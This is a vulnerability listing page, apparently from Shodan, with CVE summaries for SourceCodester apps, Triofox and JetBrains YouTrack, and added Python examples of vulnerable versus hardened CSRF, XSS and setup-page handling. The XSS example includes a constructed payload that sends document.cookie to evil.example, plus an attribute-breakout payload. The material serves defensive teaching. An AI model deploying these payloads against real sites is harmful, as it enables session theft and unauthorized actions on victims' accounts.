Security Vulnerabilities
Cross-Site Request Forgery (CSRF) in SourceCodester Product Expiry Management System. The User Management module (delete-user.php) allows remote attackers to delete arbitrary user accounts via forged cross-origin GET requests because the endpoint relies solely on session cookies and lacks CSRF protection.
CVSS Score
8.8
EPSS Score
0.0
Published
2025-11-10
A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the "Add Tasks" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser.
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10
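The "Add Tasks" finding above is a stored XSS: the task text is saved as submitted and later written into the page without output encoding. The following Python snippet is an added example, not code from SourceCodester or the Simple To-Do List System; it models the vulnerable render next to a hardened one that encodes on output. The task list, the `title` attribute in the template and the payloads are constructed for the demonstration.

```python
import html

# Constructed stand-in for the stored task rows; a real app reads them from its database.
STORED_TASKS: list = []


def add_task(text: str) -> None:
    """Store the task text exactly as submitted.

    Storing raw input is not the bug; the bug is emitting it into HTML
    without encoding on output, so every viewer of the list runs it.
    """
    STORED_TASKS.append(text)


def render_vulnerable(tasks) -> str:
    # Task text is interpolated straight into markup, both as element text
    # and inside a double-quoted attribute (assumed template).
    return "".join(f'<li title="{t}">{t}</li>' for t in tasks)


def render_hardened(tasks) -> str:
    # html.escape(quote=True) turns < > & " ' into entities, which is the
    # correct encoding for element text and for a double-quoted attribute.
    return "".join(
        f'<li title="{html.escape(t, quote=True)}">{html.escape(t, quote=True)}</li>'
        for t in tasks
    )


def has_raw_script_tag(page: str) -> bool:
    """True when an unencoded <script tag made it into the rendered page."""
    return "<script" in page.lower()


def attribute_escaped(page: str) -> bool:
    """True when no attribute value was broken out of: each rendered <li>
    carries exactly the two delimiting quotes that the template itself emits."""
    return all(li.count('"') == 2 for li in page.split("</li>") if li)


if __name__ == "__main__":
    # Constructed payloads: one for the text context, one for the attribute context.
    script_payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    attr_payload = '" onmouseover="alert(1)'
    add_task(script_payload)
    add_task(attr_payload)
    print("vulnerable:", render_vulnerable(STORED_TASKS))
    print("hardened:  ", render_hardened(STORED_TASKS))
```

The second payload matters as much as the first: encoding only `<` and `>` would stop the `<script>` case but still let a quote close the `title` attribute and introduce an event handler, which is why the hardened version escapes quotes too.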
The send_message.php endpoint in SourceCodester Simple Public Chat Room 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). The application does not implement any CSRF-protection mechanism such as anti-CSRF tokens, nonces, or SameSite cookie restrictions. An attacker can create a malicious HTML page that, when visited by an authenticated user, automatically submits a forged POST request to the vulnerable endpoint. The browser attaches the victim's session cookie, so the request is executed with the victim's privileges, allowing the attacker to perform unauthorized actions on their behalf, such as sending arbitrary messages in any chat room.
CVSS Score
6.5
EPSS Score
0.0
Published
2025-11-10
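Both CSRF entries on this page (the delete-user.php GET in Product Expiry Management System and the send_message.php POST in Simple Public Chat Room) share one root cause: the endpoint trusts the session cookie, which the browser attaches to cross-site requests automatically, and checks nothing that a cross-site page cannot supply. The Python below is an added example written for this page, not code from SourceCodester or either project. It models the vulnerable pattern next to a hardened handler that rejects GET for state changes, requires a per-session synchronizer token compared in constant time, and checks the `Origin`/`Referer` header. The `Request` class, the `PHPSESSID` cookie name, the site origin and the user list are constructed assumptions; the same logic applies to the chat endpoint with `id` replaced by the message fields.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed stand-in for an incoming HTTP request; a real framework exposes
# the same fields (method, cookies, headers, and the GET/POST parameters).
@dataclass
class Request:
    method: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)


SESSIONS = {}                              # session id -> session record
SITE_ORIGIN = "https://app.example.com"    # assumed origin of the application
SESSION_COOKIE = "PHPSESSID"               # assumed cookie name (PHP default)


def login(user: str) -> str:
    """Create a session and bind a fresh, random CSRF token to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the legitimate page embeds in its form; a cross-site page cannot read it."""
    return SESSIONS[sid]["csrf"]


def session_of(req: Request):
    return SESSIONS.get(req.cookies.get(SESSION_COOKIE))


def delete_user_vulnerable(req: Request, users: set) -> int:
    """Pattern described in the advisories: the cookie is the only check and
    the action is reachable by a plain GET, so an <img src=...> on any site fires it."""
    if session_of(req) is None:
        return 401
    users.discard(req.params.get("id"))
    return 200


def _origin_ok(req: Request) -> bool:
    origin = req.headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    # Clients that omit Origin still send Referer on same-origin form posts.
    return req.headers.get("Referer", "").startswith(SITE_ORIGIN + "/")


def csrf_check(req: Request) -> bool:
    """Synchronizer-token check plus an Origin/Referer check; both must pass."""
    if req.method != "POST":
        return False                       # state changes never ride on GET
    sess = session_of(req)
    if sess is None or not _origin_ok(req):
        return False
    supplied = req.params.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(supplied.encode(), sess["csrf"].encode())


def delete_user_hardened(req: Request, users: set) -> int:
    if session_of(req) is None:
        return 401
    if not csrf_check(req):
        return 403
    users.discard(req.params.get("id"))
    return 200


if __name__ == "__main__":
    users = {"alice", "bob", "carol"}
    sid = login("alice")
    # Constructed forged request: the victim's browser attaches the cookie,
    # the attacker's page controls everything else.
    forged = Request("GET", cookies={SESSION_COOKIE: sid},
                     headers={"Referer": "https://evil.example/"}, params={"id": "bob"})
    print("vulnerable:", delete_user_vulnerable(forged, users), sorted(users))
    print("hardened:  ", delete_user_hardened(forged, users), sorted(users))
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a worthwhile second layer, but it is browser-enforced and does not replace the server-side token check shown here.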
CVE-2025-12480
Known exploited
Triofox versions prior to 16.7.10368.56560 are vulnerable to an Improper Access Control flaw that allows access to initial setup pages even after setup is complete.
CVSS Score
9.1
EPSS Score
0.627
Published
2025-11-10
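The Triofox entry is a state-dependent access-control failure: pages that must be open during first-run setup stay reachable afterwards. The snippet below is an added example, not Triofox code and not a description of how Triofox is built; it shows the gate a practitioner would put in front of such pages, keyed on a persisted "setup complete" flag, with the request path canonicalised first so that case differences, repeated slashes or `..` segments cannot route around the prefix check. The `/setup/` prefix, the `InstallState` record and the sample paths are constructed assumptions.

```python
import posixpath
import re
from dataclasses import dataclass

# Constructed stand-in for the persisted install state; a real product reads
# this from its configuration store or database, not from process memory.
@dataclass
class InstallState:
    setup_complete: bool = False


SETUP_PREFIX = "/setup/"   # assumed location of the first-run pages


def canonical_path(path: str) -> str:
    """Collapse repeated slashes, resolve ../ segments and lower-case the
    result so the prefix check cannot be skipped with /Setup/ or /x/../setup/."""
    path = re.sub(r"/+", "/", path)
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def is_setup_page(path: str) -> bool:
    p = canonical_path(path)
    # Match on a path-segment boundary so /setupwizard.html is not a setup page.
    return p == SETUP_PREFIX.rstrip("/") or p.startswith(SETUP_PREFIX)


def setup_page_allowed(state: InstallState, path: str) -> bool:
    """Gate evaluated before any setup handler runs.

    Before setup finishes the pages must be reachable to create the initial
    admin; afterwards they are denied to everyone, and re-running setup needs
    an explicit, out-of-band reset of the flag rather than an open URL.
    """
    if not is_setup_page(path):
        return True            # not a setup page: normal authorization applies
    return not state.setup_complete


def complete_setup(state: InstallState) -> None:
    """Called once the initial admin exists; from here on setup pages are closed."""
    state.setup_complete = True


if __name__ == "__main__":
    st = InstallState()
    print("before setup:", setup_page_allowed(st, "/setup/createadmin"))
    complete_setup(st)
    for p in ("/setup/createadmin", "/Setup/CreateAdmin", "/portal/../setup/createadmin", "/login"):
        print(f"after setup {p}:", setup_page_allowed(st, p))
```

The flag lives in persistent state on purpose: a check that only remembers "setup done" in memory reopens the setup pages on every restart.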
In JetBrains YouTrack before 2025.3.104432 missing TLS certificate validation enabled data disclosure
CVSS Score
8.1
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 missing user principal cleanup led to reuse of incorrect authorization context
CVSS Score
3.1
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 improper access control allowed modification of MCP tool logic
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 missing VCS URL validation allowed delegation to unauthorized repositories from the Junie widget
CVSS Score
7.4
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 a misconfiguration in Junie could lead to exposure of the global Junie token
CVSS Score
9.6
EPSS Score
0.0
Published
2025-11-10
In JetBrains YouTrack before 2025.3.104432 insecure Junie configuration could lead to data exposure and unauthorized changes
CVSS Score
5.4
EPSS Score
0.0
Published
2025-11-10
Shodan ® - All rights reserved